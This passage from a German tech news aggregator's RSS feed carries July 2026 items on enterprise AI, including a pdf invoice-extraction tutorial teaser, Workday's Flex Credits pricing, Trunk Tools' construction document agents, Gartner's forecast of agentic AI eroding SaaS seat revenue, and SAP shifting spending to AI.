<title><![CDATA[Designing a Schema-Guided Invoice Intelligence Pipeline with lift-pdf for Accounts-Payable Extraction, Validation, and Ledger Generation]]></title>
<description><![CDATA[In this tutorial, we build an end-to-end accounts-payable extraction pipeline with lift-pdf, using synthetic invoice PDFs as controlled test documents and a structured JSON schema as the target output format. Instead of treating invoice parsing as a simple OCR task, we frame it as schema-guided d...]]></description>
<link>https://tsecurity.de/de/3644438/ai-nachrichten/designing-a-schema-guided-invoice-intelligence-pipeline-with-lift-pdf-for-accounts-payable-extraction-validation-and-ledger-generation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644438/ai-nachrichten/designing-a-schema-guided-invoice-intelligence-pipeline-with-lift-pdf-for-accounts-payable-extraction-validation-and-ledger-generation/</guid>
<pubDate>Fri, 03 Jul 2026 23:33:03 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this tutorial, we build an end-to-end accounts-payable extraction pipeline with lift-pdf, using synthetic invoice PDFs as controlled test documents and a structured JSON schema as the target output format. Instead of treating invoice parsing as a simple OCR task, we frame it as schema-guided document understanding: we generate realistic invoices, define fields such as […]</p>
<p>The post <a href="https://www.marktechpost.com/2026/07/03/schema-guided-invoice-intelligence-pipeline-with-lift-pdf/">Designing a Schema-Guided Invoice Intelligence Pipeline with lift-pdf for Accounts-Payable Extraction, Validation, and Ledger Generation</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Unpacking Workday’s agentic AI pricing model]]></title>
<description><![CDATA[Only 35% of CIOs have full visibility into their AI operating costs, according to a recent KPMG survey. That makes it difficult for them to control spend on software-as-a-service offerings from vendors who, like Workday, have incorporated pay-as-you-go agentic AI into their offerings. Workday is ...]]></description>
<link>https://tsecurity.de/de/3644080/it-nachrichten/unpacking-workdays-agentic-ai-pricing-model/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644080/it-nachrichten/unpacking-workdays-agentic-ai-pricing-model/</guid>
<pubDate>Fri, 03 Jul 2026 19:04:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Only 35% of CIOs have full visibility into their AI operating costs, according to a recent KPMG survey. That makes it difficult for them to control spend on software-as-a-service offerings from vendors who, like Workday, have incorporated pay-as-you-go agentic AI into their offerings. Workday is one of several vendors that have shifted to a <a href="https://www.cio.com/article/4057792/workday-unveils-new-agents-a-new-cloud-and-a-developer-platform.html">hybrid subscription/consumption pricing model</a>.</p>



<p>“Fundamentally, with AI we are shifting the value of what enterprise software as a service is delivering in the industry,” Workday CTO Gabe Monroy explained in a recent interview. “The key, though, is that the value is no longer derived by a fixed factor, like how many employees you have working for you. It’s now going to be derived by how much use are you getting out of the system, hence the consumption.”</p>



<p>However, “It’s going to be in some cases disruptive to our customers, and it’s incumbent on us to provide them with tools to forecast and navigate that transition effectively,” he said.</p>



<p>That will be welcome news for the 40% of organizations that <a href="https://assets.kpmg.com/content/dam/kpmgsites/xx/pdf/2026/06/global-ai-pulse-q2.pdf.coredownload.inline.pdf" target="_blank" rel="nofollow">KPMG found</a> have usage or token budgets in place.</p>



<p>The changes Monroy described are part of an industry trend, according to <a href="https://www.infotech.com/profiles/terra-higginson" target="_blank" rel="nofollow">Terra Higginson</a>, principal research director at Info-Tech Research Group. “What we are seeing in the market is that basic seat pricing and seat counts are not going away. Customers are still paying for the core subscription footprint. AI is being layered on top as an incremental cost,” she said. “The practical message is simple: expect to pay more. The pricing model may shift from seats to credits or consumption, but the direction of spend is still up.”</p>



<p>And because each vendor’s program has its own twists and its own ways of measuring and charging for usage, every new model adds a layer of complexity to the budgeting headaches CIOs already face thanks to the ongoing move to consumption-based services, which began with the cloud.</p>



<h2 class="wp-block-heading">Two parts to the model</h2>



<p>Workday’s AI pricing model is in two parts. First, customers subscribe to the services they want, as they always have. With that subscription, they receive a pool of Flex Credits that can be used to enable AI agents and other “applicable platform capabilities” including Agent-Ready Tools, Workday Data Cloud, and high-volume use of <a href="https://www.cio.com/article/4146511/workday-integrates-sana-to-turn-its-enterprise-apps-into-agentic-execution-engines.html">Sana through its conversational AI interface</a>. The number of credits included varies by company size. But on top of that, they also purchase a subscription for additional Flex Credits that can be applied to any product they subscribe to.</p>



<p>Flex Credit usage is monitored through the Platform Consumption Console, which generates alerts when consumption hits 80%, 90% and 100% of subscribed credits. Use is metered when a task is completed.</p>



<p>However, one Flex Credit doesn’t necessarily equal one action. Workday’s <a href="https://www.workday.com/content/dam/web/en-us/documents/legal/flex-credits-rate-card.pdf" target="_blank" rel="nofollow">rate card</a> lists the number of credits per activity; for example, as of May 21, in the Recruiting Agent, it currently costs six credits to screen and grade each candidate’s resumé against a job opening, and 750 credits per requisition to identify relevant leads in existing talent pools and rediscover candidates for recruiters, recommending jobs for those candidates to apply for. In the Contract Negotiation Agent, the review and redlining of a contract, based on a playbook, costs 500 credits.</p>



<p>The company also provides a <a href="https://www.workday.com/content/dam/web/en-us/documents/legal/sana-platform-self-service-reference.pdf" target="_blank" rel="nofollow">reference guide</a> listing the credits used by actions performed by the Sana platform and by self-service agents.</p>



<p>The good news is that, though Workday’s console counts credits used in both production and pre-production environments, only those used in production are charged for, offering an early budgeting reality check and a chance to tweak processes before they land in production. Pre-production usage count is only in aggregate, however, so if a customer wants to size a specific agent, the best approach is to run it in a defined window or dedicated test tenant and compare usage before and after the test<em>.</em></p>



<h2 class="wp-block-heading">Use them or lose them</h2>



<p>The bad news is that Flex Credits expire after one year, and any left in a subscription do not roll over to the next; it’s a use them or lose them situation.</p>



<p>If, on the other hand, a customer exceeds their Flex Credit balance during the year, Workday said it does not just turn off their agents or other access to services. Instead, Workday’s account teams “partner with them to reconcile usage and help them purchase additional credits.”</p>



<p>Analysts agree that there are pros and cons to this new market reality.</p>



<p>“Workday’s Flex Credits are part of a broader shift we’re seeing across SaaS,” said <a href="https://moorinsightsstrategy.com/team/melody-brue/" target="_blank" rel="nofollow">Melody Brue</a>, principal analyst at Moor Insights &amp; Strategy. “Vendors are defining their own proprietary units for AI consumption so they can meter usage on top of existing subscriptions.”</p>



<p>Workday’s model, she said, is more flexible than a static AI add-on because customers can use Flex Credits for whichever agents drive the most value at a given time and get access to new AI capabilities as they launch.</p>



<p>The trade-off, however, is predictability. “Credit burn rates vary widely by task,” she said. A pilot can quietly consume a year’s worth of Flex Credits within weeks without strong telemetry and governance. And that, she said is what worries technology and finance leaders: apparently successful AI adoption that shows up as a budget surprise.</p>



<p>But, said <a href="https://www.infotech.com/profiles/scott-bickley" target="_blank" rel="nofollow">Scott Bickley</a>, advisory fellow at Info-Tech Research Group, “The Workday Flex Credits Rate Card seeks to quantify consumption of Flex Credits to specific value-added actions that are AI agent-driven. Many other vendors in the ERP space have created incredibly complex, multi-layered consumption models, leaving their customers’ heads spinning as they seek to decipher how capacity will be consumed, much less if it can add value.”</p>



<p>Brue, too, approved of Workday’s model, although she said that a core issue with AI pricing today is that <a href="https://www.cio.com/article/4138622/awu-by-salesforce-a-shiny-new-metric-that-tells-cios-little-of-value.html">vendors are each defining their own units</a>, with no common measurement across platforms. This gives vendors pricing flexibility, but makes customers do extra work to create meaningful metrics like cost per resolution or cost per process run, just to keep budgets and ROI under control.</p>



<p>“Workday’s Flex Credits are a smart move for Workday because they align revenue with AI usage, but from the buyer’s side, they raise the bar on FinOps and governance,” she said. “You need clear dashboards, guardrails, and forecasting, or that flexibility can quickly turn into a budget black hole.”</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Trunk Tools' stack cut document review from 60 days to 10 by ditching general-purpose models]]></title>
<description><![CDATA[Most verticals aren’t clean, well-oiled SaaS databases; the reality is ugly documents, proprietary schemas, implicit workflows, and long‑running tasks that most general-purpose models struggle with. This prompted construction project management company Trunk Tools to build a specialized, three-la...]]></description>
<link>https://tsecurity.de/de/3643726/it-nachrichten/trunk-tools-stack-cut-document-review-from-60-days-to-10-by-ditching-general-purpose-models/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643726/it-nachrichten/trunk-tools-stack-cut-document-review-from-60-days-to-10-by-ditching-general-purpose-models/</guid>
<pubDate>Fri, 03 Jul 2026 15:46:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Most verticals aren’t clean, well-oiled SaaS databases; the reality is ugly documents, proprietary schemas, implicit workflows, and long‑running tasks that most general-purpose models struggle with. </p><p>This prompted construction project management company Trunk Tools to build a specialized, three-layer architecture — perception, semantics, agents — based on highly-detailed data to support high-accuracy, highly-relevant industry automation.</p><p>Their purpose-built stack has shrunk review cycles from months to days, prevented costly field errors, and given autonomous agents the ability to reason over millions of pages of documentation, Trunk says. </p><p>“We really set out to take the data from dispersed systems, pre-process it, structure it, go through our ontology into a knowledge graph, and then train AI models,” said Sarah Buchner, Trunk’s founder and CEO and a former carpenter. </p><p>For builders in other verticals, Trunk’s approach could serve as a blueprint for transforming data chaos into agent‑ready, industry-specific workflows. </p><h2>Where general-purpose LLMs break down on industry data </h2><p>Foundation LLMs, while powerful, are optimized for breadth, not always depth. </p><p>“General-purpose LLMs are trained to be okay at everything, so they're weak at anything niche,” said Kriti Faujdar, a senior product manager working in AI infrastructure, agentic AI, security, and LLM platforms. For instance: Rare terms, domain-specific reasoning, the unspoken context that any practitioner “just knows.” </p><p>Web, app, and software developer Sébastien De Bollivier agreed that the biggest bottleneck is reliability on data that is “jargon-dense, abbreviation-heavy, and format-specific.” </p><p>“A GPT-4-class model can understand a French legal contract, but will fumble the specific article references practitioners need to cite,” he said. </p><p>Besides, the most valuable enterprise data never made it into pretraining anyway, Faujdar pointed out. It's sitting in internal systems and proprietary formats. “RAG helps a little,” she said. “But it's just giving better facts to a model that still can't reason properly in the domain.”</p><p>Pre-training on domain data is critical; enterprises should then fine-tune on good task examples and build their own evals. “A few thousand examples from real practitioners beats millions of scraped, noisy ones," Faujdar said. </p><p>Mixture-of-experts (MoE) can provide specialization without inference costs blowing up. Pairing RAG with fine-tuning also works well; RAG handles the factual long trail while fine-tuning fixes vocabulary and reasoning.</p><p>De Bollivier pointed to the advantage of hybrid stacks: A general-purpose model for reasoning and orchestration, a smaller fine-tuned model (or dense retrieval over a curated corpus) for domain-specific extraction. He advised: “Don't fine-tune to make the model 'smarter' about a domain, fine-tune to make it more reliable on the specific output format your workflow requires.”</p><p>The trades and construction are certainly industries seeing traction with these techniques, as are legal and healthcare, De Bollivier said. These verticals have “high stakes for errors plus standardized document formats, equaling clear domain-training ROI.”</p><p>One honest caveat worth mentioning, Faujdar said: Specialized models can often fall apart outside their domain, so they’re often not useful outside their expertise (unless they’re re-trained). </p><h2>Perception, semantics, agents: inside Trunk's three-layer stack</h2><p>In highly-specialized domains like construction, “data dumps” into large language models (LLMs) don’t cut it, said Trunk’s CTO Amrish Kapoor. This is because most transformers are probabilistic models: When given an image, they report back that it is “probably” a tree, or “probably” a child playing next to a tree. </p><p>This makes them insufficient for high‑precision symbolic interpretation. For instance, in construction documents, a 2-millimeter-wide symbol has a vastly different meaning depending on where it’s placed. </p><p>Further, constrained by context limits, probabilistic models struggle with long‑term project memory. “I don't mean a context window of a few tokens,” Kapoor said. “I'm talking about long term memory that stretches across months and years, because this is how long some of these projects are.”</p><p>Instead, Trunk’s three-layer system breaks workflows into: </p><ul><li><p>Perception (reading and extracting data from messy docs like PDFs, drawings, or scans)</p></li><li><p>A semantic/graph layer (making sense of that data and understanding their relationships).</p></li><li><p>LLMs and agents on top.</p></li></ul><p>Construction drawings are typically symbolic, Buchner said. A door isn't always labeled ‘door.’ Sometimes it's simply an arc on a wall that a trained eye learns to read based on years of practice. </p><p>“The perception layer is what teaches AI to read that language,” she said. The semantic layer then gives that information meaning; for instance, connecting the door to the drawing that details it, the spec that governs it, and the trade that installs it. This helps answer project engineers’ critical questions: Not "is there a door here?" but "does this door create a problem down the line?"</p><p>Particularly in construction, that shift matters because the cost of a problem compounds with time. “A conflict caught in design is relatively low cost to address,” Buchner said, “whereas the same problem caught in the field might cost tens of thousands of dollars.” </p><p>At a high level, the system identifies the document type and begins extracting information based on content (drawing, schedules, paragraph text). This data is then “transformed and augmented” in the platform, which triggers agentic workflows like knowledge graph relationships and end-user workflows. </p><p>For instance, an agent might review an architecture bulletin and produce a visual overlay comparing an older version and a newer version (flagging additions and removals), then generate written narratives that describe what those changes are in simple terms. This helps users understand what’s changed and coordinate with trade partners on updated pricing and change orders. </p><h2>The scale of construction’s data problem</h2><p>Construction workflows are “ripe with implicit assumptions and connections between data in its myriad of sources,” Buchner said. And the amount of unstructured data is “humanly impossible” to process or make sense of.</p><p>Buchner estimated the average high-rise building generates about 3.6 million pages of corresponding documentation. “If you print it into a stack of papers it would be as high as the building itself.” </p><p>All three layers of Trunk’s stack — perception, semantic, LLM — are trained on “very specific datasets” from customers with “explicit permissions” and auto‑labeling/IP, Kapoor explained. Customers who don’t want Trunk training on their data can opt out. </p><p>Data is deidentified and aggregated, and Trunk also collects “tons more” labeled data through other pipelines like 3D building information modeling (BIM). </p><p>Trunk says it only ships agents that achieve around 95% accuracy. The team maintains continuous evaluation pipelines based on ground truth data from customers and experts. They also employ an LLMs-as-a-judge model. </p><p>“This notion of an LLM as a judge is to score how well you're doing, both subjectively as well as objectively,” Kapoor said. Objectivity can be an easy ‘right’ or ‘not right,’ but subjectivity requires more nuance. </p><p>For instance, when creating an email or narrative or explanation, an LLM as a judge framework can create a composite score, or a numerical value that aggregates different metrics and tests a model's performance or risk.</p><p>There can be challenges, though, particularly with latency, Buchner noted; any time the reasoning capacity of underlying models increases, the risk of latency goes up, too. Trunk maintains a set of evaluation criteria to objectively measure latency whenever changes are made to underlying infrastructure, agents, and API calls. </p><p>Then, “before we release to customers, we ensure marginal changes to the end-user experience are well worth the performance enhancements,” Buchner said. </p><h2>From 60 days to 10: the measurable payoff</h2><p>Trunk’s platform powers seven AI agents purpose-built for construction, such as analyzing request for information (RFI) responses, overviewing bids, or reviewing drawings and submittals. </p><p>The submittal agent, for instance, flags missing, conflicting, or noncompliant information in product specs and RFIs. While it’s an essential step in the construction process, “it's a super annoying workflow,” Buchner said, because human reviewers have to compare documents “with a bunch of other parts of documents.” </p><p>But the agent is able to do this in seconds, and Trunk says it has reduced submittal cycles from 50 to 60 days to 10, “which has massive schedule and financial implications.” </p><p>Trunk is now at a place where these agents are communicating directly with each other, which is “quite exciting,” Buchner said. So, for example, one agent will review an architectural drawing for accuracy, then autonomously hand it over to agents handling RFIs and asking follow-up questions. </p><p>“If the drawings have problems, the RFI agent is taking over and is actively reaching out for clarification,” Buchner explained. </p><p>Trunk says its customers report savings of 20 to 40 minutes per field question. Buchner said that users in the field know better than anyone how much of a “time suck” it is to go back and forth from office trailers, dig through project documents in scattered systems or printed PDFs, reconcile discrepancies, and return to coordinate with trade partners. </p><p>Trunk says its customers report these additional outcomes:</p><ul><li><p>Average 8 minute time savings for single-document retrieval (status checks, location lookups, quantity queries).</p></li><li><p>Average 20 minute time savings for standard referencing (cross-referencing 2 to 3 spec sections to form an answer. </p></li><li><p>Average 40 minute time savings for multi-document research (listing and filtering queries, mapping relationships, analyzing RFIs and submittals across 4 to 6 documents).</p></li><li><p>Average 75 minute time savings for complex tasks (creating RFIs and other communication materials, deep cross-referencing across documents, change tracking). </p></li></ul><p>In one instance, Trunk’s drawing review agent flagged that a structural beam had been moved up 8.5 inches. However, this was not documented by the architect. If the change hadn’t been caught, the project manager would likely have had to strip out and reinstall the right size beam, Buchner said. This rework would have added $10,000 or more to the budget, and “certainly there would have been implications on the schedule.” </p><p>Buchner also pointed to other examples: an agent flagged $60,000 in exaggerated pricing with no justification from landscaping subcontractors; identified a fireplace that needed to be sealed prior to drywall installation, saving around $100,000 in labor, materials, and delays; and called out that an electric door required a panel that wasn’t included in electrical drawings. </p><h2>Learnings for other industries</h2><p>Trunk’s approach to building agents is applicable to any vertical working with high volumes of unstructured, industry-specific data. 

Builders working in specific verticals must understand the industry’s specific data challenges their end users face and build technical infrastructure that can transform unstructured data into something an “LLM can traverse and understand,” Buchner said. 

“Only then can you build the connections between data points that ultimately feed agentic workflows.”

A lot of money is being invested in foundational models, so enterprises should build modular systems that can leverage the strengths of various models as they continue to improve, Buchner advised. 

Then, “build your technical advantage where the generic models are not investing and not performing well,” she said. </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gartner: Agentic AI gefährdet SaaS-Umsätze in Milliardenhöhe]]></title>
<description><![CDATA[Die Ungewissheit der Marktentwicklung im SaaS-Umfeld beschäftigt nicht nur die Börse. Auch CIOs müssen umdenken und vorsorgen.Gorodenkoff / Shutterstock



KI-Agenten könnten die Geschäftsmodelle klassischer Enterprise-Softwareanbieter grundlegend verändern. Bis 2030 stehen dadurch laut Gartner w...]]></description>
<link>https://tsecurity.de/de/3643541/it-security-nachrichten/gartner-agentic-ai-gefaehrdet-saas-umsaetze-in-milliardenhoehe/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643541/it-security-nachrichten/gartner-agentic-ai-gefaehrdet-saas-umsaetze-in-milliardenhoehe/</guid>
<pubDate>Fri, 03 Jul 2026 14:37:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/shutterstock_2426274919.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Verzweifelter Manager an der Börse " class="wp-image-4192765" width="1024" height="540" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Die Ungewissheit der Marktentwicklung im SaaS-Umfeld beschäftigt nicht nur die Börse. Auch CIOs müssen umdenken und vorsorgen.</figcaption></figure><p class="imageCredit">Gorodenkoff / Shutterstock</p></div>



<p>KI-Agenten könnten die Geschäftsmodelle klassischer Enterprise-Softwareanbieter grundlegend verändern. Bis 2030 stehen dadurch laut Gartner weltweit bis zu 234 Milliarden Dollar an Ausgaben für Unternehmenslösungen auf dem Spiel. Denn autonome Systeme interagieren zunehmend direkt mit Business-Anwendungen und umgehen dabei menschliche Nutzer.</p>



<p>„Unternehmen kaufen Software künftig nicht mehr in erster Linie für Menschen, sondern zunehmend für KI-Agenten“, erklärt <a href="https://www.gartner.com/en/experts/george-brocklehurst" target="_blank" rel="noreferrer noopener">George Brocklehurst</a>, Managing Vice President bei Gartner, im Gespräch mit CIO.com. „Seit Jahrzehnten wird Software nach ihrer Benutzeroberfläche, der User Experience, der Bedienbarkeit, den Workflows und dem Schulungsaufwand bewertet. Wenn KI-Agenten jedoch zu den primären Nutzern werden, verlieren diese Faktoren erheblich an Bedeutung.“</p>



<p>Nach Schätzungen von Gartner werden die gefährdeten Umsätze bis zum Ende des Jahrzehnts rund 20 Prozent der weltweiten Enterprise-SaaS-Ausgaben ausmachen.</p>



<h2 class="wp-block-heading">“Agentic Arbitrage” verändert den Softwaremarkt</h2>



<p>Als Ursache nennt Gartner den Trend zur sogenannten „Agentic Arbitrage“. Gemeint ist der Einsatz von KI-Agenten, die Geschäftsprozesse eigenständig über mehrere Unternehmensanwendungen hinweg ausführen. Dadurch müssen Beschäftigte immer seltener direkt mit den Benutzeroberflächen einzelner Anwendungen arbeiten.</p>



<p>„Agentische KI verändert die Ökonomie von Software“, erklärt Brocklehurst. Diese Systeme übersprängen häufig die klassische Softwareoberfläche und lieferten direkt die gewünschten Ergebnisse. Dadurch werde die bislang enge Verbindung zwischen der Zahl der Anwender und dem Umsatz vieler Softwarehersteller aufgebrochen.</p>



<h2 class="wp-block-heading">CIOs müssen Software neu bewerten</h2>



<p>Für CIOs bedeutet diese Entwicklung laut Brocklehurst ein Umdenken bei der Auswahl und Beschaffung von Unternehmenssoftware.</p>



<p>Statt vor allem auf Benutzerfreundlichkeit und Oberflächendesign zu achten, sollten Unternehmen künftig prüfen, ob KI-Agenten über APIs sämtliche Geschäftsprozesse ausführen können, die bislang über die Benutzeroberfläche von Menschen erledigt werden.</p>



<p>„Entscheidend ist zunächst, ob ein Agent über die API alles – und idealerweise mehr – erledigen kann als ein Mensch über den Bildschirm und ob die Lizenzbedingungen des Herstellers dies überhaupt zulassen“, so Brocklehurst.</p>



<p>Dies verändert auch die Art und Weise, wie Softwareverträge bewertet werden sollten.</p>



<p>„Prüfen Sie die Vertragsbedingungen genauso sorgfältig wie die Technologie selbst“, rät der Gartner-Mann. „Die Lizenzbedingungen vieler Anbieter können die Nutzung durch autonome Systeme Dritter technisch oder finanziell einschränken oder sogar untersagen. CIOs könnten feststellen, dass ihre KI-Strategie nicht an fehlender Technologie scheitert, sondern an Klauseln, die sie bereits unterschrieben haben.“</p>



<p>Sein Rat: Unternehmen sollten bereits heute vertraglich festschreiben, welche Rechte KI-Agenten bei der Nutzung von Unternehmenssoftware erhalten. Viele der heute abgeschlossenen Verträge werden noch gültig sein, wenn Agentic AI im Unternehmensalltag zum Standard geworden ist.</p>



<h2 class="wp-block-heading">Die Wissenshoheit wird zum nächsten Streitpunkt</h2>



<p>Neben APIs und Lizenzbedingungen sollten Unternehmen genau darauf achten, wo das durch KI entstehende operative Wissen gespeichert und genutzt wird, betont Brocklehurst.</p>



<p>Jede Korrektur, jede Ausnahme und jeder Workflow, den ein KI-Agent verarbeitet, erzeuge neues organisatorisches Wissen.</p>



<p>Gartner bezeichnet die Fähigkeit eines Unternehmens, dieses Wissen zu bewahren, als Knowledge Retention Rate (KRR).</p>



<p>„Wenn dieses Wissen in die gemeinsamen Modelle des Softwareanbieters einfließt, verbessert Ihre operative Erfahrung ein Produkt, das auch Ihre Wettbewerber nutzen“, so Brocklehurst. „Die wichtigste Klausel der nächsten Generation von Softwareverträgen lautet daher: Wem gehört das, was das System von Ihnen lernt?“</p>



<p>Nach Einschätzung von Gartner droht Unternehmen eine neue Form des Vendor Lock-in, wenn das im Betrieb gewonnene Wissen beim Softwareanbieter verbleibt statt beim Kunden.</p>



<h2 class="wp-block-heading">Klassische SaaS-Ökonomie gerät unter Druck</h2>



<p>Laut Gartner könnten KI-Agenten, die Aufgaben über mehrere Unternehmensanwendungen hinweg ausführen, die direkte Interaktion der Nutzer mit traditionellen Softwareoberflächen reduzieren. Dadurch würde die seit langem etablierte Verbindung zwischen tatsächlicher Softwarenutzung und nutzerbasierter Lizenzierung (Seat-based Licensing) zunehmend an Bedeutung verlieren.</p>



<p>Gartner empfiehlt etablierten Softwareanbietern deshalb, ihren Mehrwert künftig weniger über Benutzeroberflächen als vielmehr über geschäftliche Ergebnisse (Outcomes) zu definieren. Gleichzeitig sollten sie agentengestützte Funktionen direkt in Geschäftsprozesse integrieren und sicherstellen, dass kundenspezifisches Wissen erhalten bleibt.</p>



<p>Davon könnten KI-native Start-ups und Serviceanbieter gleichermaßen profitieren. Sie haben die Chance, sich als Orchestrierungsebene zu etablieren, die Arbeitsabläufe über mehrere Unternehmensanwendungen hinweg koordiniert.</p>



<p>„Während dieser Wandel eine existenzielle Bedrohung für Anbieter darstellt, die an veralteten Dashboards und nutzerbasierten Modellen festhalten, eröffnet er gleichzeitig erhebliche Umsatzchancen für Unternehmen, die Services und Plattformen für agentengestützte, bereichsübergreifende Workflows entwickeln“, so Brocklehurst.</p>



<h2 class="wp-block-heading">Governance muss mit autonomen Systemen Schritt halten</h2>



<p>Gartner rät CIOs außerdem, Governance-Strukturen aufzubauen, bevor autonome KI-Agenten zum Standard werden.</p>



<p>„Autonomie sollte niemals stillschweigend oder uneinheitlich vergeben werden“, betont Brocklehurst. Unternehmen sollten die Autonomie von Agenten als explizite Governance-Entscheidung behandeln und dabei festlegen, wo Agenten unabhängig agieren dürfen, wer diese Entscheidungen genehmigt und wie häufig diese Berechtigungen überprüft werden sollten.</p>



<p>„Unternehmen, die diese Fähigkeiten bereits heute entwickeln, werden schneller und zugleich sicherer handeln können, wenn die Technologie den nächsten Reifegrad erreicht“, so der Gartner-Analyst.</p>



<p>Obwohl Gartner den Wandel als eine Neudefinition der seit Jahren diskutierten „Saaspocalypse“ beschreibt, erwartet Brocklehurst keineswegs das Ende von Software-as-a-Service.</p>



<p>„Das ist weniger eine Apokalypse als vielmehr eine Metamorphose“, erklärt er. „SaaS wird nicht verschwinden – nur in einer anderen Form weiterbestehen.“ (mb)</p>



<p><em>Dieser Artikel basiert auf einem </em><a href="https://www.cio.com/article/4192242/agentic-ai-puts-234b-in-enterprise-saas-spending-at-risk-gartner-says.html" target="_blank"><em>Beitrag von CIO.com</em></a><em>.</em></p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Interview: Oracle NetSuite’s Evan Goldberg – SaaSpocalypse averted]]></title>
<description><![CDATA[The executive vice-president of Oracle NetSuite discusses the evolution of AI in SaaS ERP, countering any SaaSpocalypse narrative, citing an ecosystem knowledge edge]]></description>
<link>https://tsecurity.de/de/3643439/it-nachrichten/interview-oracle-netsuites-evan-goldberg-saaspocalypse-averted/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643439/it-nachrichten/interview-oracle-netsuites-evan-goldberg-saaspocalypse-averted/</guid>
<pubDate>Fri, 03 Jul 2026 13:48:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The executive vice-president of Oracle NetSuite discusses the evolution of AI in SaaS ERP, countering any SaaSpocalypse narrative, citing an ecosystem knowledge edge]]></content:encoded>
</item>
<item>
<title><![CDATA[Is the SaaSpocalypse over? And if so, what comes next?]]></title>
<description><![CDATA[Far from becoming obsolete overnight, many SaaS firms are well positioned to use AI to strengthen their market position.]]></description>
<link>https://tsecurity.de/de/3643263/it-nachrichten/is-the-saaspocalypse-over-and-if-so-what-comes-next/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643263/it-nachrichten/is-the-saaspocalypse-over-and-if-so-what-comes-next/</guid>
<pubDate>Fri, 03 Jul 2026 12:33:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Far from becoming obsolete overnight, many SaaS firms are well positioned to use AI to strengthen their market position.]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic AI 'breaks the traditional SaaS seat licensing model' – now it’s up to vendors to ditch 'legacy dashboards' and build with agents in mind]]></title>
<description><![CDATA[Incumbent software vendors will need to work harder than ever to compete with agile, AI-focused disruptors]]></description>
<link>https://tsecurity.de/de/3643224/it-security-nachrichten/agentic-ai-breaks-the-traditional-saas-seat-licensing-model-now-its-up-to-vendors-to-ditch-legacy-dashboards-and-build-with-agents-in-mind/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643224/it-security-nachrichten/agentic-ai-breaks-the-traditional-saas-seat-licensing-model-now-its-up-to-vendors-to-ditch-legacy-dashboards-and-build-with-agents-in-mind/</guid>
<pubDate>Fri, 03 Jul 2026 12:22:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Incumbent software vendors will need to work harder than ever to compete with agile, AI-focused disruptors]]></content:encoded>
</item>
<item>
<title><![CDATA[SAP cuts hiring and travel to fund AI]]></title>
<description><![CDATA[SAP is limiting hiring and travel spending to help pay for its AI transformation.



The tech giant will “exclusively focus new hiring on selected profiles only, mainly core Al roles, that are critical for our long-term success,” staff were reportedly told in an internal email.



The email also ...]]></description>
<link>https://tsecurity.de/de/3643139/it-nachrichten/sap-cuts-hiring-and-travel-to-fund-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643139/it-nachrichten/sap-cuts-hiring-and-travel-to-fund-ai/</guid>
<pubDate>Fri, 03 Jul 2026 11:32:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>SAP is limiting hiring and travel spending to help pay for its AI transformation.</p>



<p>The tech giant will “exclusively focus new hiring on selected profiles only, mainly core Al roles, that are critical for our long-term success,” staff were reportedly told in an internal email.</p>



<p>The email also said that internal travel, unless it is related to AI development, will be suspended, and that the company is looking at ways to cut other spending with suppliers, <a href="https://www.bloomberg.com/news/articles/2026-07-02/sap-restricts-hiring-travel-to-fund-significant-ai-push" target="_blank" rel="nofollow">Bloomberg reported</a>.</p>



<p>An SAP spokesperson confirmed the report, telling <em>CIO</em>, “SAP continually reviews its investments to ensure resources are focused on the areas that will drive long-term customer value and innovation. As part of this approach, we are prioritizing investments in AI-related capabilities, talent, and technologies while applying greater discipline to hiring, external spending, and internal travel. Customer-facing activities and critical AI initiatives remain fully supported.”</p>



